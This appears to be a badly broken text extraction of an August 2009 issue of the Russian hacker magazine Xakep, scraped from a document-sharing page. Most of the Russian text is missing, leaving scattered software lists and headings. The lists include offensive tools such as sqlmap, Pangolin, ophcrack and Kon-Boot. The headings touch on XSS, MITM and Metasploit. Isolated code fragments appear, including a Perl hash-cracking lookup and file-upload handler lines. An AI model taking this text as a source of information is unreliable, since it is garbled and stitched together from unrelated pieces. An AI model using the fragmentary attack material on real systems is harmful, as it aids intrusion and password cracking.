7-Zip 4.65
AIMP 2.51
Autoruns for Windows v9.5
DAEMON Tools Lite 4.30.4
Download Master 5.5.12.1172
FarPowerPack 1.15
FileZilla Client 3.2.7-rc1
K-Lite Mega Codec Pack 5.0
Miranda IM 0.8.3
Mozilla Firefox 3.5.2
Notepad++ 5.4.5
Opera 9.64
PuTTY 0.60
QIP 2005 Build 8094
Skype 4.04.0
Total Commander 7.04a
Unlocker 1.8.7
Xakep CD DataSaver 5.2
XnView 1.96.2
Project Voldemort
Apache CouchDB
Redis
MemcacheDB
>>UNIX
>Devel
Adobe AIR 1.5.2
Aptana Studio 1.5
Bouml 4.13.1
fingerprint'
Nmap
p0f v2
THC-Amap
httprint
NetworkMiner
ike-scan
Xprobe2
Satori
SinFP
>Security
Aircrack-ng 1.0RC4
bsqlbf 2.3
Charles 3.3.1
Damn Vulnerable Web App 1.0.4
dhcdrop 0.4
dradis 2.2
GFI LANguard 9
Kon-Boot 1.1
Microsoft KAPIMON 5.1
ophcrack 3.3.1
Pangolin 2.5.2.975
Privoxy2 3.0.14
ProxyStrike 2.1
SCRT Webshag 1.10
Sipflanker 1.5beta
sqlmap 0.7
Tor IM Browser Bundle 1.2.6
Watcher 1.2.1
Wireshark 1.2.1
>System
Apache HTTP Server Version 2.2
Agnitum Outpost Firewall Free 2009
AVG Anti-Virus Free Edition 8.5
DiskDigger 0.8.3
HDDScan 3.2
HWiNFO32 3.10
MyDefrag 4.1.2
Outpost Firewall Pro 2009
Process Lasso 3.63b
R-Studio 5.00
UNetbootin 3.57
USB-Drive Protector 1.02
VirtualBox 3.0.2
Xming 7.4.0.3
>Multimedia
ImgBurn 2.5
MediaInfo 0.7.9
MetatOGGer 3.9.2.0
Nero Free 9.4.12.3
PDFTools 1.3
Shup 0.27
SmillaEnlarger 0.8
STDU Viewer 1.5.275
VirtualDub 1.9.4
VLC (VideoLAN) 1.0.1
>Security
Aircrack-ng 1.0rc4
beholder 0.8.6
dhcdrop 0.4
Dradis 2.2.0
Grendel Scan 1.0
Justniffer 0.5.6
Middler 1.0
mysqltr4cker 1.2
Nmap 5.0
nschaind 0.3
packet-o-matic 20090726
PHPIDS 0.6
Privoxy 3.0.14b
sipflanker 1.5beta
sshdautoban 0.75
Tor 0.2.0.35
Vidalia 0.1.15
VoIPER 0.0.7
WEPBuster 1.0
Yaptest 0.2.1
>X-Distr
Linux From Scratch 6.4
Solaris 10
>System
ATI 9.7
Collectd 4.7.2
JPC
Linux Kernel 2.6.30.4
LVM2 2.02.50
Man pages 3.22
nVidia 185.18.29
quagga 0.99.14
Safecopy 1.5
Sudo 1.7.2
Virtualbox 3.0.2
Wine 1.1.26
Xf86-video-intel 2.8.0
>Net
Adobe Flash Player 10.0.32.18
aria2 1.5.1
Arora 0.8
Fetchmail 6.3.10
Flock 2.5.1
gPodder 0.17.0
KMess 2.0
Liferea 1.6
Linuxdcpp 1.0.3
Lynx 2.8.7
Minitube 0.5
Miro 2.5
Mozilla Firefox 3.5.1
Opera 9.64
Psi 0.13
Putty 0.60
qutIM 0.2 beta2
Sylpheed 2.7
WeeChat 0.3.0 rc2
Xchat 2.8.6
>Games
ManiaDrive 1.2
>Server
Apache 2.2.12
Asterisk 1.4.26
BIND 9.4.3 P3
Cups 1.4rc1
Dovecot 1.2.2
HAproxy 1.3.19
Hybrid 7.2.3
IRC Services 5.1.9
Kamailio 1.5.2
NFS Ganesha 0.99.57
OpenDS 2.0
OpenLDAP 2.4.17
OpenSSH 5.2
OpenVPN 2.1rc19
Prosody 0.5.1
rsyslog 4.5.1
Samba 3.4
Squid 3.0.STABLE17
Xorg server 1.6.3
Bugzilla 3.4
Bviplus 0.5.2
Clutter 1.0.0
Django 1.1
gtk+ 2.17.6
GtkHTML 3.26.3
jEdit 4.2
MILEPOST GCC 4.4.0
MPS 1.0
Nasm 2.07
pgAdmin 1.10.0
Scons 1.2.0
SmartCVS 7.0.9
SWIG 1.3.39
Unique 0.18
Zend Framework 1.9.0
Zend Studio 7.0
08(128) 2009
x
. 26

fingerprinting
. 20
SQL

: 2
10
.
. 52
PCI
SQL!
START
. 56
. 46
08 (128) 2009
HTTP://WWW2

WHAT THE FONT?

new.myfonts.com/
WhatTheFont
.
- . ,
, .
What The Font ,
, .

. , ,
-
-.

Firefox
FIREFOX BUILDER
ffbuilder.ru
,
Firefox, .
. : ffbuilder.ru . : , ,
!
144
PHOTOSHOP ONLINE
www.photoshop.com
Adobe -
Photoshop. , ,
. ,
, ,
Photoshop online. ,

.
Linux-

SUSE STUDIO
susestudio.com
!
- .
JeOS, openSUSE SUSE Linux Enterprise,
,
.
: ISO-, LiveCD,
Xen VMware.
, !
X 08 /128/ 09

Хакер 2009 08 PDF

Загружено:

Сведения о документе

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Хакер 2009 08 PDF

Загружено:

Авторское право:

Доступные форматы

.

ASUS EEE PC 1008HA

Full-guide Secure Shell

IM, Skype, P2P

/ .: (495) 935-7034, : (495) 780-8824

MIFRILL / MIFRILL@R EAL.XAKEP.RU /

Imagine Cup 2009

USB 3.0 SATA 6 Gbit/s

Sony Ericsson, Motorola, Apple, LG,

: Intel Core i7 Extreme 965

ASUS P6T6 WS Revolution

ASRock X58 Deluxe

TREND CLUB , . Trend Club

The red fox

The red fox

PUTTY CONNECTION MANAGER

2- ssh (2-hop ssh tunnel)?

HDD, USB-Flash USB-HDD

disk=/dev/sda2 ( sda2 sda3)

set-video_resolution=1280x1024 (1024x768, 1152x864,

HDD Black Screen ( ;

allow from 130.116.18.

if ($connect->content =~ /Cleartext of $hash is (.*)/)

wp_die(__('Invalid plugin page'));

3. XSS Related Ways To Take Action:

Exclude actions by term :

SendUploadResults( '1', '', '',

4. Dashboard- WP Security Scanner:

5. Intrusion Detection System:

// Is enabled the upload?

// Get the uploaded file name.

$sFilePath = $sServerDir . $sFileName ;

ServerMapFolder() folder path

DENIAL OF SERVICE MOZILLA FIREFOX

'tabindex' => '1',

XSS RELATED WAYS TO TAKE ACTION

struct sock *sk = tun->sk;

// if tun is NULL return error

Fingerprint: Windows XP Service Pack 2+

172.16.1.10 , Web-, st.exe ,

MITM (Man in the

NTLM), SNMP-community string .

GUI CANVAS METASPLOIT

PREDIDENTUA / HTTP://TUTAMC.COM, SPIRT40@GMAIL.COM /

IN RESPONSE TO THE COMMANDS FROM

IN RESPONSE TO THE COMMANDS FROM

/ ICQ 884888, HTTP://WAP-CHAT.RU /

lokimaros@stephenfry How about how

mail- <= 5.3,

: Intel Pentium II 400

# yum groupinstall Russian

(yum groupinstall XFCE).

LINUX MINT 7 GLORIA

CALCULATE LINUX DESKTOP 9.6 XFCE

MOBLIN V2 UX (USER EXPERIENCE) BETA

auth sufficient pam_listfile.so item=user

, item tty, user, rhost, ruser, group, shell.

, vasya, ssh-, /usr/chroot .

/ ZOBNIN@GMAIL.CO /, / GRINDER@UA.FM/, / DHSILABS@MAIL.RU/

CFQ (Completely Fair Queuing), ,

I/O (c1); multicount (-m64),

# echo anticipatory > /sys/block/sda/queue/scheduler

: O(1), CFS (Completely Fair Scheduler, ,